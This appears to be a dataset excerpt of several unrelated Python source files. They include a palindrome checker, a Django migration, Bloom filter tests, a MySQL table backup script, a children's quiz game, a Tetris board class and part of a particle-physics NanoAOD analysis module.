print(sl.isMonotonic(inp))
|
4,386 | 21d499555b4bc4944996a57ae544a56aa317b00b | for t in range(int(input())):
st = list(input())
N,j = len(st),1
for i in range(N//2):
if st[i]=='*' or st[-i-1]=='*':
break
elif st[i] != st[-i-1]:
j=0
break
print('#{} Exist'.format(t+1)) if j else print('#{} Not exist'.format(t+1)) |
4,387 | 309f8016dfebcc3595291b127edb4634f72298ec | # -*- coding: utf-8 -*- #
import time
from openerp.osv import osv, fields
import logging
import openerp.addons.decimal_precision as dp
logger = logging.getLogger(__name__)
class ebiz_supplier_account_create(osv.osv_memory):
_name = 'ebiz.supplier.account.create.wizard'
_description = "Ebiz Supplier Account"
def create_supplier_action(self, cr, uid, ids, context=None):
active_ids = context.get('active_ids',False)
supplier_ids = self.pool['ebiz.supplier.account.line'].create_ebiz_supplier_account_line(cr, uid, active_ids, context=context)
return {
'view_type': 'form',
'view_mode': 'tree',
'res_model': 'ebiz.supplier.account.line',
'type': 'ir.actions.act_window',
'domain':[('id','in',supplier_ids or [0])],
}
ebiz_supplier_account_create()
|
4,388 | e67cbddf10440e8a31373e05a82840677d3045f5 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2018-12-20 13:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0006_usermovies_img'),
]
operations = [
migrations.AddField(
model_name='moviesinfo',
name='country',
field=models.CharField(default=1, max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='moviesinfo',
name='description',
field=models.CharField(default=1, max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='moviesinfo',
name='director',
field=models.CharField(default=1, max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='moviesinfo',
name='grenre',
field=models.CharField(default=1, max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='moviesinfo',
name='year',
field=models.CharField(default=1, max_length=8),
preserve_default=False,
),
migrations.AddField(
model_name='usermovies',
name='country',
field=models.CharField(default=1, max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='usermovies',
name='description',
field=models.CharField(default=1, max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='usermovies',
name='director',
field=models.CharField(default=1, max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='usermovies',
name='grenre',
field=models.CharField(default=1, max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='usermovies',
name='year',
field=models.CharField(default=1, max_length=8),
preserve_default=False,
),
]
|
4,389 | 24e486edc6f80e0b7d58b5df898e6d34f53111c8 | from pyloom import *
import random
import string
alphabet = string.ascii_letters
def random_string(N):
return ''.join([random.choice(alphabet) for _ in range(N)])
class TestBloomFilter(object):
def test_setup(self):
bf = BloomFilter(1000)
assert 10 == bf._num_hashes
assert 14380 == bf._num_bits
assert 14380 == len(bf._bitarray)
# and initially all bits are False
assert 0 == bf._bitarray.count()
# test again with a different false positive rate
bf = BloomFilter(1000, error=0.01)
assert 7 == bf._num_hashes
assert 9583 == bf._num_bits
assert 9583 == len(bf._bitarray)
# and initially all bits are False
assert 0 == bf._bitarray.count()
def test_add_contains(self):
bf = BloomFilter(1000, error=0.01)
keys1 = [random_string(10) for _ in range(1000)]
keys2 = [random_string(10) for _ in range(1000)]
for k in keys1:
bf.add(k)
assert k in bf
class TestScalableBloomFilter(object):
def test_scaling(self):
S, N, E = 1000, 10000, 0.01
# create a bloom filter with initial capacity of S
sbf = ScalableBloomFilter(S, E, 2)
keys1 = {random_string(10) for _ in range(N)}
keys2 = {random_string(10) for _ in range(N)}
for k in keys1:
sbf.add(k)
assert k in sbf
error = 0
total = 0
for k in keys2:
if k in keys1:
continue
total += 1
if k in sbf:
error += 1
error_rate = error / total
assert error_rate <= 2 * 0.01, 'Error rate is %.3f when it should be %.3f' % (error_rate, E)
|
4,390 | fd76a7dd90bac7c7ba9201b6db62e6cb3eedeced | import mysql.connector
from getpass import getpass
tables_schema = {
"Country": "SELECT 'Id','Name','Code' " +
"UNION ALL " +
"SELECT Id, Name, Code ",
"Indicator": "SELECT 'Id','Name','Code' " +
"UNION ALL " +
"SELECT Id, Name, Code ",
"Year": "SELECT 'Id','FiveYearPeriod','TenYearPeriod' " +
"UNION ALL " +
"SELECT Id, FiveYearPeriod, TenYearPeriod ",
"Metric": "SELECT 'CountryId','IndicatorId','YearId','Measurement' " +
"UNION ALL " +
"SELECT CountryId, IndicatorId, YearId, Measurement "
}
dbconnector = None
cursor = None
def backup_db(cursor):
for table in tables_schema: backup_table(cursor, table)
def backup_table(cursor, table):
cursor.execute(f"{tables_schema[table]}" +
f"INTO OUTFILE '/tmp/{table.lower()}_data.csv' " +
"FIELDS TERMINATED BY ',' " +
"LINES TERMINATED BY '\\n' " +
f"FROM {table}")
def print_report(db_name):
print (f"Database: '{db_name}' successfully backed up under '\\tmp' directory!")
def connect_db(password, db_name):
global dbconnector, cursor
dbconnector = mysql.connector.connect(
host = "localhost",
user = "root",
passwd = password,
database = db_name,
autocommit = True
)
cursor = dbconnector.cursor()
def main():
password = getpass("MySQL password:")
db_name = "WORLDMETRIC"
connect_db(password, db_name)
backup_db(cursor)
print_report(db_name)
dbconnector.close()
main() |
4,391 | 16e10db90a0a0d8ee7ca5b0c7f86cc81432d87d1 | import webbrowser as wb
points = 0
import time as t
import pyautogui as pg
name = pg.prompt("What is your name? ").title()
pg.alert(name)
if name == "Caroline":
pg.alert ("Hi " + name)
points += 5
t.sleep(1)
wb.open ("https://www.textgiraffe.com/Caroline/Page2/")
elif name == "Bob":
pg.alert (name + ",you are a great person!")
points += 3
t.sleep(1)
wb.open("http://dreamworks.wikia.com/wiki/File:Bob_the_Builder.jpeg")
elif name == "Catherine":
pg.alert (name + "I like you already.")
points += 2
t.sleep(2)
wb.open ("https://www.amazon.com/Catherine-Street-Sign-Reflective-Aluminum/dp/B00KY6ZDZW")
elif name == "James":
pg.alert ("nice to meet you" + name)
points += 1
t.sleep(1)
wb.open ("https://www.youtube.com/watch?v=uV9LYMAEnRA")
elif name == "Kate":
pg.alert ("Hello!")
points += 2
t.sleep (1)
wb.open ("https://www.google.com/search?q=kate+name&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj-3cyIyJzeAhVRnOAKHRnoCtQQ_AUIDigB&biw=924&bih=639#imgrc=sbQIiK5VLfo7kM:")
elif name == "Will":
pg.alert ("Coool!")
ponts += 3
t.sleep (2)
wb.open ("https://www.google.com/search?q=will+name&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj3n93PyJzeAhWvY98KHcoWCFEQ_AUIDigB&biw=924&bih=639#imgrc=Z0hfeIoXQgHxJM:")
else:
pg.alert ("I don't know you!")
points += 0
t.sleep(2)
wb.open ("https://www.google.com/search?q=smiley+face&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjwsdL4gYveAhXtc98KHaGcAz0Q_AUIDigB&biw=1366&bih=657")
color = pg.prompt ("what is your favorite color? ").title()
if color == "Blue":
pg.alert ("mine too!")
points += 5
t.sleep(1)
wb.open ("https://www.youtube.com/watch?v=SoIKv3xxuMA")
elif color == "Pink":
pg.alert ("Do you like unicorns too?")
points += 2
t.sleep(2)
wb.open ("https://www.youtube.com/watch?v=a-xWhG4UU_Y")
elif color == "Purple":
pg.alert ("cool!")
points += 3
t.sleep(1)
wb.open ("https://www.youtube.com/watch?v=TvnYmWpD_T8")
elif color == "Black":
pg.alert ("ok...")
points -= 2
t.sleep(2)
wb.open ("https://www.google.com/search?q=goth&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiJ-tDj-oreAhUpUt8KHWZsAzQQ_AUIDigB&biw=1366&bih=657#imgrc=odGcWJwuqRcJsM:")
elif color == "Yellow":
pg.alert ("Like a sunflower!")
points += 1
t.sleep (1)
wb.open ("https://www.google.com/search?q=sunflower&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiZyKCTyZzeAhXGc98KHd8kDJ8Q_AUIDigB&biw=924&bih=639#imgrc=8kZ1NZp_9-nr5M:")
elif color == "Brown":
pg.alert ("wow.")
points -= 5
t.sleep (1)
wb.open ("https://www.youtube.com/watch?v=dsJtgmAhFF4")
else:
pg.alert("nice")
points += 1
t.sleep(2)
wb.open ("https://giphy.com/explore/rainbow")
sport = pg.prompt ("What is your favorite sport? ").title()
if sport == "Hockey":
pg.alert ("yep, I guess your cool")
points += 5
t.sleep(2)
wb.open ("https://www.youtube.com/watch?v=JDnZTUkCOBQ")
elif sport == "Soccer":
pg.alert ("you mean futbol...")
points += 5
t.sleep(2)
wb.open ("https://www.youtube.com/watch?v=K-U1ZgrsGGg")
elif sport == "Lacrosse":
pg.alert (" I used to play..")
points += 2
t.sleep(2)
wb.open ("https://www.youtube.com/watch?v=o5hsPBsGD44")
elif sport == "Football":
pg.alert ("that cool.")
points += 4
t.sleep(3)
wb.open ("https://www.google.com/search?q=football&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwimsOqj_IreAhUumeAKHd-FD6kQ_AUIDigB&biw=1366&bih=657#imgrc=GCqjPQ-jqckcfM:")
elif sport == "Field Hockey":
pg.alert ("Nice!")
points += 2
t.sleep(3)
wb.open ("https://www.google.com/search?q=field+hockey&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwieus2jypzeAhWvVN8KHeK1CJ8Q_AUIDigB&biw=924&bih=639#imgrc=FCpGZY2CS5KVXM:")
elif sport == "Surfing":
pg.alert ("WOAH")
points += 7
t.sleep(1)
wb.open ("https://www.youtube.com/watch?v=HBklS2vYEPo")
else:
pg.alert ("cool")
points += 0
t.sleep(2)
wb.open ("https://www.google.com/search?q=no+sports&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiGqOK-_IreAhXFneAKHcEGANIQ_AUIDigB&biw=1366&bih=657#imgrc=y7acx-yoEouoUM:")
subject = pg.prompt ("What is your favorite subject?").title()
if subject == "Math":
pg.alert ("so your a mathmatician")
points += 2
t.sleep(3)
wb.open ("https://www.google.com/search?rlz=1C1GCEA_enUS752US774&biw=1366&bih=657&tbm=isch&sa=1&ei=HNvFW9yoDYTm_QbUyKzgDw&q=addiong&oq=addiong&gs_l=img.3..0i10i24.5226.6666..6852...1.0..0.56.417.8......0....1..gws-wiz-img.......0j0i67j0i10.kcqMNDR26RY#imgrc=LqznGvY1fJpCGM:")
elif subject == "Computer science":
pg.alert ("nice")
points += 9
t.sleep(3)
wb.open ("https://www.google.com/search?q=computers&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiom6vv_IreAhUuneAKHXVGA4kQ_AUIDygC&biw=1366&bih=657")
elif subject == "English":
pg.alert ("I like it too.")
points += 3
t.sleep(3)
wb.open ("https://www.google.com/search?rlz=1C1GCEA_enUS752US774&biw=1366&bih=657&tbm=isch&sa=1&ei=hNvFW4e3Jafp_QbR26mIDw&q=+book&oq=+book&gs_l=img.3..0i67l3j0j0i67j0l5.3464.3464..3690...0.0..0.51.51.1......0....1..gws-wiz-img.2n6KjdjVyU0")
elif subject == "Science":
pg.alert ("Bill Nye the Science Guy.")
points += 3
t.sleep(2)
wb.open("https://www.youtube.com/watch?v=nDN7M0J3HXc")
elif subject == "Spanish":
pg.alert ("Hola! Como estas?")
points += 3
t.sleep(2)
wb.open ("https://www.google.com/search?hl=en&authuser=0&rlz=1C1GCEA_enUS752US774&tbm=isch&q=fiesta&chips=q:fiesta,online_chips:mexican+fiesta&usg=AI4_-kQGU87DySQyv0Aqat3pdqhIpYYwjA&sa=X&ved=0ahUKEwjzjvL6lq7eAhWpTd8KHQ6-CIoQ4lYIKygE&biw=924&bih=639&dpr=1#imgrc=6H_w7py8kTIUHM:")
elif subject == "History":
pg.alert ("In 1492 Christopher Columbus sailed the ocean blue")
points += 3
t.sleep(2)
wb.open ("https://www.google.com/search?q=history&rlz=1C1GCEA_enUS752US774&biw=1366&bih=657&tbm=isch&source=lnms&sa=X&ved=0ahUKEwiZ_YDvutHeAhXOVN8KHdEUDEkQ_AUICygC")
else:
pg.alert ("cool")
points += 1
t.sleep(2)
wb.open ("https://www.google.com/search?q=school+gif&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjqpI_f_YreAhWsd98KHblYBY8Q_AUIDigB&biw=1366&bih=657#imgrc=kk5pi12VrUoKGM:")
food = pg.prompt ("What is your favorite food?").title()
if food == "Pizza":
pg.alert ("Pizza Hut? Dominos?")
points += 2
t.sleep(2)
wb.open ("https://cooking.nytimes.com/guides/1-how-to-make-pizza")
elif food == "Chocolate cake":
pg.alert ("Now I want one")
points += 9
t.sleep(3)
wb.open ("https://www.youtube.com/watch?v=dsJtgmAhFF4")
elif food == "Pasta":
pg.alert ("I like pasta!")
points += 3
t.sleep(3)
wb.open ("https://www.google.com/search?q=pasta&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwiH_JXSlK7eAhWKT98KHScQASEQ_AUIDigB&biw=924&bih=639")
elif food == "Ice cream":
pg.alert ("What kind? I like cookie monster.")
points += 3
t.sleep(2)
wb.open("https://barefeetinthekitchen.com/homemade-ice-cream-recipe/")
elif food == "Fruit":
pg.alert ("Refreshing!")
points += 3
t.sleep(2)
wb.open ("https://www.google.com/search?q=fruit&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwijobOcla7eAhVyUt8KHfONDGUQ_AUIDigB&biw=924&bih=639#imgrc=ACrdFKwEzni-QM:")
elif food == "Chicken":
pg.alert ("Yum!")
points += 2
t.sleep(2)
wb.open ("https://www.google.com/search?q=chicken&rlz=1C1GCEA_enUS752US774&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj59fTCutHeAhXLct8KHRV6D88Q_AUIEygB&biw=1366&bih=657")
else:
pg.alert ("YUUMMM")
points += 1
t.sleep(2)
wb.open ("https://www.youtube.com/watch?v=11HK5EuYwSk")
movie = pg.prompt ("What is your favorite movie series?").title()
if "Divergent" in movie:
number = pg.prompt("Which movie is your favorite").title()
if number == "1":
pg.alert("Nice!")
ice_cream = pg.confirm("Which of these flavors is your favorite?", "Choose one", ["chocolate", "vanilla", "cookies and cream"])
if ice_cream == "cookies and cream":
pg.alert("YES")
pg.alert ("Your final score is " + str(points))
|
4,392 | 9fc184fe3aa498138138403bef719c59b85b3a80 | import json
def main():
with open('./src/test/predictions.json', 'r') as f:
data = json.load(f)
total = len(data['label'])
google = 0
sphinx = 0
for i in range(len(data['label'])):
label = data['label'][i]
google_entry = data['google'][i]
sphinx_entry = data['pocket_sphinx'][i]
if google_entry == label:
google += 1
if sphinx_entry == label:
sphinx += 1
print('Google %d out of %d: %.4f' %(google, total, google/total))
print('Pocket Sphinx %d out of %d: %.4f' %(sphinx, total, sphinx/total))
if __name__ == "__main__":
main() |
4,393 | 2d7431996bc8d1099c08fddc815b4706deb4f023 |
from arcade.sprite_list.sprite_list import SpriteList
import GamePiece as gp
from Errors import *
class GameConfig:
WINDOW_TITLE = "MyPyTris"
SCREEN_WIDTH = 450
SCREEN_HEIGHT = 900
BLOCK_PX = 45 # 45px blocks on screen
SPRITE_PX = 64 # 64px sprite
BLOCK_SCALE = BLOCK_PX/SPRITE_PX # sprite scale ratio
class GameBoard:
""" Class to manage blocks on the game board """
def __init__(self, width: int, height: int):
# 2D list of blocks initialized to empty in the width and height of our game board
self.width = width
self.height = height
self.blocks = [[None for y in range(width)] for x in range(height)]
self.playerSprites = SpriteList()
self.groundSprites = SpriteList()
def draw(self):
self.playerSprites.draw()
self.groundSprites.draw()
def canMoveBlock(self, x: int, y: int) -> bool:
return self.blocks[x][y] is None
def canMoveGamePiece(self, gamePiece:gp.GamePiece, xTo:int, yTo:int) -> bool:
for yDiff, row in enumerate(gamePiece.blocks):
for xDiff, block in enumerate(row):
if block is None:
continue
newX = xTo + xDiff
newY = yTo + yDiff
if newX >= self.width or newX < 0:
return False
if newY < 0 or newY >= self.height:
return False
if self.blocks[newY][newX] is not None \
and self.blocks[newY][newX] not in gamePiece.allBlocks():
return False
return True
def moveGamePiece(self, gamePiece:gp.GamePiece, xTo:int, yTo:int):
if (not self.canMoveGamePiece(gamePiece, xTo, yTo)):
return False
# remove blocks from game board
for y, row in enumerate(gamePiece.blocks):
for x, block in enumerate(row):
if block is not None:
self.blocks[y + gamePiece.y][x + gamePiece.x] = None
# add blocks in new positions
for y, row in enumerate(gamePiece.blocks):
for x, block in enumerate(row):
if block is not None:
blockXDiff = block.x - gamePiece.x
blockYDiff = block.y - gamePiece.y
newBlockX = xTo + blockXDiff
newBlockY = yTo + blockYDiff
self.blocks[newBlockY][newBlockX] = block
block.moveTo(newBlockX, newBlockY)
gamePiece.x = xTo
gamePiece.y = yTo
def addBlock(self, aBlock: gp.Block):
"""adds a block to the game board"""
if self.blocks[aBlock.y][aBlock.x] != None:
raise MovementError('game board space not empty')
self.blocks[aBlock.y][aBlock.x] = aBlock
self.groundSprites.append(aBlock.sprite)
def addGamePiece(self, gamePiece:gp.GamePiece):
for y in range(gamePiece.size):
for x in range(gamePiece.size):
block = gamePiece.blocks[y][x]
if block is None:
continue
self.blocks[block.y][block.x] = block
self.playerSprites.append(block.sprite)
def moveBlock(self, aBlock: gp.Block, x: int, y: int):
self.blocks[aBlock.y][aBlock.x] = None
self.blocks[y][x] = aBlock
def removeBlock(self, aBlock: gp.Block):
""" remove a block from the game board """
for y, row in iter(self.blocks):
for x, block in iter(row):
if block is aBlock:
self.blocks[y][x] = None
self.playerSprites.remove(aBlock.sprite)
return
class GameManager:
def __init__(self) -> None:
pass
def start(self):
gameBoard = GameBoard(10, 20)
gameBoard.addGamePiece() |
4,394 | 1721bba2cae1e330bffeb9df05341df9522ff885 | import ROOT
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module
from TreeProducer import *
from TreeProducerCommon import *
from CorrectionTools.PileupWeightTool import *
from CorrectionTools.BTaggingTool import BTagWeightTool, BTagWPs
from CorrectionTools.MuonSFs import *
from CorrectionTools.ElectronSFs import *
from CorrectionTools.RecoilCorrectionTool import getTTptWeight, getTTPt
from CorrectionTools.DYCorrection import *
import struct
import numpy as np
class LLProducer(Module):
def __init__(self, name, DataType, filelist, **kwargs):
self.name = name
self.out = TreeProducer(name)
self.sample = filelist
if DataType=='data':
self.isData = True
self.isMC = False
else:
self.isData = False
self.isMC = True
self.year = kwargs.get('year', 2017 )
self.tes = kwargs.get('tes', 1.0 )
self.ltf = kwargs.get('ltf', 1.0 )
self.jtf = kwargs.get('jtf', 1.0 )
year = self.year
self.filter = getMETFilters(year,self.isData)
if not self.isData:
self.muSFs = MuonSFs(year=year)
self.elSFs = ElectronSFs(year=year)
self.puTool = PileupWeightTool(year =year)
self.btagToolAK8_deep = BTagWeightTool('DeepCSV','AK8','loose',sigma='central',channel='ll',year=year)
self.btagToolAK8_deep_up = BTagWeightTool('DeepCSV','AK8','loose',sigma='up',channel='ll',year=year)
self.btagToolAK8_deep_down = BTagWeightTool('DeepCSV','AK8','loose',sigma='down',channel='ll',year=year)
self.btagToolAK4_deep = BTagWeightTool('DeepCSV','AK4','loose',sigma='central',channel='ll',year=year)
self.btagToolAK4_deep_up = BTagWeightTool('DeepCSV','AK4','loose',sigma='up',channel='ll',year=year)
self.btagToolAK4_deep_down = BTagWeightTool('DeepCSV','AK4','loose',sigma='down',channel='ll',year=year)
if 'DYJetsToLL' in self.sample[0]:
self.DYCorr = DYCorrection('DYJetsToLL')
elif 'ZJetsToNuNu' in self.sample[0]:
self.DYCorr = DYCorrection('ZJetsToNuNu')
elif 'WJetsToLNu' in self.sample[0]:
self.DYCorr = DYCorrection('WJetsToLNu')
self.runJEC = False
JEC_samples = ['Zprime','WWTo','WZTo','ZZTo','GluGluHToBB','ZH_HToBB','Wplus','Wminus']
for JEC_sample in JEC_samples:
if self.sample[0].find(JEC_sample)>0:
self.runJEC = True
def beginJob(self):
pass
def endJob(self):
if not self.isData:
self.btagToolAK8_deep.setDirectory(self.out.outputfile,'AK8btag_deep')
self.btagToolAK4_deep.setDirectory(self.out.outputfile,'AK4btag_deep')
self.out.outputfile.Write()
self.out.outputfile.Close()
def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):
pass
def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):
pass
def fillBranches(self,event):
self.out.isMC[0] = self.isMC
self.out.is2016[0] = self.is2016
self.out.is2017[0] = self.is2017
self.out.is2018[0] = self.is2018
self.out.EventNumber[0] = event.event
self.out.LumiNumber[0] = event.luminosityBlock
self.out.RunNumber[0] = event.run
self.out.EventWeight[0] = self.EventWeight
self.out.TopWeight[0] = self.TopWeight
self.out.BTagAK8Weight[0] = self.BTagAK8Weight
self.out.BTagAK4Weight[0] = self.BTagAK4Weight
self.out.BTagAK8Weight_deep[0] = self.BTagAK8Weight_deep
self.out.BTagAK8Weight_deep_up[0] = self.BTagAK8Weight_deep_up
self.out.BTagAK8Weight_deep_down[0] = self.BTagAK8Weight_deep_down
self.out.BTagAK4Weight_deep[0] = self.BTagAK4Weight_deep
self.out.BTagAK4Weight_deep_up[0] = self.BTagAK4Weight_deep_up
self.out.BTagAK4Weight_deep_down[0] = self.BTagAK4Weight_deep_down
self.out.BBTagWeight[0] = self.BBTagWeight
self.out.GenWeight[0] = self.GenWeight
self.out.PUWeight[0] = self.PUWeight
self.out.LeptonWeight[0] = self.LeptonWeight
self.out.LeptonWeightUp[0] = self.LeptonWeightUp
self.out.LeptonWeightDown[0] = self.LeptonWeightDown
self.out.TriggerWeight[0] = self.TriggerWeight
self.out.TriggerWeightUp[0] = self.TriggerWeightUp
self.out.TriggerWeightDown[0] = self.TriggerWeightDown
self.out.QCDNLO_Corr[0] = self.QCDNLO_Corr
self.out.QCDNNLO_Corr[0] = self.QCDNNLO_Corr
self.out.EWKNLO_Corr[0] = self.EWKNLO_Corr
self.out.isZtoNN[0] = self.isZtoNN
self.out.isZtoEE[0] = self.isZtoEE
self.out.isZtoMM[0] = self.isZtoMM
self.out.isTtoEM[0] = self.isTtoEM
self.out.isBoosted4B[0] = self.isBoosted4B
self.out.isHtobb[0] = self.isHtobb
self.out.isHtobb_ml[0] = self.isHtobb_ml
self.out.isMaxBTag_loose[0] = self.isMaxBTag_loose
self.out.isMaxBTag_medium[0] = self.isMaxBTag_medium
self.out.isMaxBTag_tight[0] = self.isMaxBTag_tight
self.out.isVBF[0] = self.isVBF
self.out.nPV[0] = event.PV_npvsGood
self.out.nTaus[0] = self.nTaus
self.out.nElectrons[0] = self.nElectrons
self.out.nMuons[0] = self.nMuons
self.out.nJets[0] = self.nJetsNoFatJet
self.out.nFatJets[0] = self.nFatJets
self.out.DPhi[0] = self.DPhi
self.out.DEta[0] = self.VHDEta
self.out.MinDPhi[0] = self.MinJetMetDPhi
self.out.MaxBTag[0] = self.MaxJetNoFatJetBTag
self.out.BtagDeepB[0] = self.BtagDeepB
self.out.DeepTagMD_H4qvsQCD[0] = self.DeepTagMD_H4qvsQCD
self.out.DeepTagMD_HbbvsQCD[0] = self.DeepTagMD_HbbvsQCD
self.out.DeepTagMD_ZHbbvsQCD[0] = self.DeepTagMD_ZHbbvsQCD
self.out.DeepTagMD_ZbbvsQCD[0] = self.DeepTagMD_ZbbvsQCD
self.out.DeepTagMD_bbvsLight[0] = self.DeepTagMD_bbvsLight
self.out.DeepTagMD_WvsQCD[0] = self.DeepTagMD_WvsQCD
self.out.DeepTagMD_ZvsQCD[0] = self.DeepTagMD_ZvsQCD
self.out.Mu1_pt[0] = self.Mu1_pt
self.out.Mu1_eta[0] = self.Mu1_eta
self.out.Mu1_phi[0] = self.Mu1_phi
self.out.Mu1_mass[0] = self.Mu1_mass
self.out.Mu1_pfIsoId[0] = self.Mu1_pfIsoId
self.out.Mu1_relIso[0] = self.Mu1_relIso
self.out.Mu1_highPtId[0] = self.Mu1_highPtId
self.out.Mu2_pt[0] = self.Mu2_pt
self.out.Mu2_eta[0] = self.Mu2_eta
self.out.Mu2_phi[0] = self.Mu2_phi
self.out.Mu2_mass[0] = self.Mu2_mass
self.out.Mu2_pfIsoId[0] = self.Mu2_pfIsoId
self.out.Mu2_relIso[0] = self.Mu2_relIso
self.out.Mu2_highPtId[0] = self.Mu2_highPtId
self.out.Ele1_pt[0] = self.Ele1_pt
self.out.Ele1_eta[0] = self.Ele1_eta
self.out.Ele1_phi[0] = self.Ele1_phi
self.out.Ele1_mass[0] = self.Ele1_mass
self.out.Ele2_pt[0] = self.Ele2_pt
self.out.Ele2_eta[0] = self.Ele2_eta
self.out.Ele2_phi[0] = self.Ele2_phi
self.out.Ele2_mass[0] = self.Ele2_mass
self.out.Ele_HEM15_16[0] = self.Ele_HEM15_16
self.out.Jet1_VBF_pt[0] = self.Jet1_VBF_pt
self.out.Jet1_VBF_eta[0] = self.Jet1_VBF_eta
self.out.Jet1_VBF_phi[0] = self.Jet1_VBF_phi
self.out.Jet1_VBF_mass[0] = self.Jet1_VBF_mass
self.out.Jet2_VBF_pt[0] = self.Jet2_VBF_pt
self.out.Jet2_VBF_eta[0] = self.Jet2_VBF_eta
self.out.Jet2_VBF_phi[0] = self.Jet2_VBF_phi
self.out.Jet2_VBF_mass[0] = self.Jet2_VBF_mass
self.out.dijet_VBF_mass[0] = self.dijet_VBF_mass
self.out.deltaR_VBF[0] = self.deltaR_VBF
self.out.deltaR_HVBFjet1[0] = self.deltaR_HVBFjet1
self.out.deltaR_HVBFjet2[0] = self.deltaR_HVBFjet2
self.out.MET[0] = event.PuppiMET_pt
self.out.MET_chs[0] = event.MET_pt
self.out.HT_HEM15_16[0] = self.HT_HEM15_16
self.out.LHEScaleWeight = self.LHEScaleWeight
self.out.LHEPdfWeight = self.LHEPdfWeight
self.out.LHEWeight_originalXWGTUP[0]= self.LHEWeight_originalXWGTUP
self.out.PrefireWeight[0] = self.PrefireWeight
self.out.PrefireWeightUp[0] = self.PrefireWeightUp
self.out.PrefireWeightDown[0] = self.PrefireWeightDown
self.out.HT[0] = self.HT
self.out.H_pt[0] = self.H_pt
self.out.H_eta[0] = self.H_eta
self.out.H_phi[0] = self.H_phi
self.out.H_mass[0] = self.H_mass
self.out.H_M[0] = self.H_M
self.out.H_tau21[0] = self.H_tau21
self.out.H_tau41[0] = self.H_tau41
self.out.H_tau42[0] = self.H_tau42
self.out.H_tau31[0] = self.H_tau31
self.out.H_tau32[0] = self.H_tau32
self.out.H_ddt[0] = self.H_ddt
self.out.H_csv1[0] = self.H_csv1
self.out.H_csv2[0] = self.H_csv2
self.out.H_deepcsv1[0] = self.H_deepcsv1
self.out.H_deepcsv2[0] = self.H_deepcsv2
self.out.H_dbt[0] = self.H_dbt
self.out.H_hadronflavour[0] = self.H_hadronflavour
self.out.H_partonflavour[0] = self.H_partonflavour
self.out.H_chf[0] = self.H_chf
self.out.H_nhf[0] = self.H_nhf
self.out.V_pt[0] = self.V_pt
self.out.V_eta[0] = self.V_eta
self.out.V_phi[0] = self.V_phi
self.out.V_mass[0] = self.V_mass
self.out.VH_deltaR[0] = self.VH_deltaR
self.out.X_pt[0] = self.X_pt
self.out.X_eta[0] = self.X_eta
self.out.X_phi[0] = self.X_phi
self.out.X_mass[0] = self.X_mass
self.out.X_mass_chs[0] = self.X_mass_chs
self.out.X_mass_nom[0] = self.X_mass_nom
self.out.X_mass_jesUp[0] = self.X_mass_jesUp
self.out.X_mass_jesDown[0] = self.X_mass_jesDown
self.out.X_mass_jerUp[0] = self.X_mass_jerUp
self.out.X_mass_jerDown[0] = self.X_mass_jerDown
self.out.X_mass_MET_nom[0] = self.X_mass_MET_nom
self.out.X_mass_MET_jesUp[0] = self.X_mass_MET_jesUp
self.out.X_mass_MET_jesDown[0] = self.X_mass_MET_jesDown
self.out.X_mass_MET_jerUp[0] = self.X_mass_MET_jerUp
self.out.X_mass_MET_jerDown[0] = self.X_mass_MET_jerDown
self.out.H_mass_nom[0] = self.H_mass_nom
self.out.H_mass_jmsUp[0] = self.H_mass_jmsUp
self.out.H_mass_jmsDown[0] = self.H_mass_jmsDown
self.out.H_mass_jmrUp[0] = self.H_mass_jmrUp
self.out.H_mass_jmrDown[0] = self.H_mass_jmrDown
self.out.tree.Fill()
def analyze(self, event):
"""process event, return True (go to next module) or False (fail, go to next event)"""
##### set variables ####
self.nElectrons = 0
self.nMuons = 0
self.nTaus = 0
self.nFatJets = 0
self.EventWeight = 1.
self.TopWeight = 1.
self.BTagAK8Weight = 1.
self.BTagAK4Weight = 1.
self.BTagAK8Weight_deep = 1.
self.BTagAK8Weight_deep_up = 1.
self.BTagAK8Weight_deep_down = 1.
self.BTagAK4Weight_deep = 1.
self.BTagAK4Weight_deep_up = 1.
self.BTagAK4Weight_deep_down = 1.
self.BBTagWeight = 1.
self.GenWeight = 1.
self.PUWeight = 1.
self.LeptonWeight = 1.
self.LeptonWeightUp = 1.
self.LeptonWeightDown = 1.
self.TriggerWeight = 1.
self.TriggerWeightUp = 1.
self.TriggerWeightDown = 1.
self.isZtoMM = False
self.isZtoEE = False
self.isZtoNN = False
self.isTtoEM = False
self.isBoosted4B = False
self.isHtobb = False
self.isHtobb_ml = False
self.isMaxBTag_loose = False
self.isMaxBTag_medium = False
self.isMaxBTag_tight = False
self.isVBF = False
self.is2016 = False
self.is2017 = False
self.is2018 = False
self.nTaus = 0
self.nJetsNoFatJet = 0
self.H_partonflavour = -1.
self.H_hadronflavour = -1.
self.DPhi = -1.
self.VHDEta = -1.
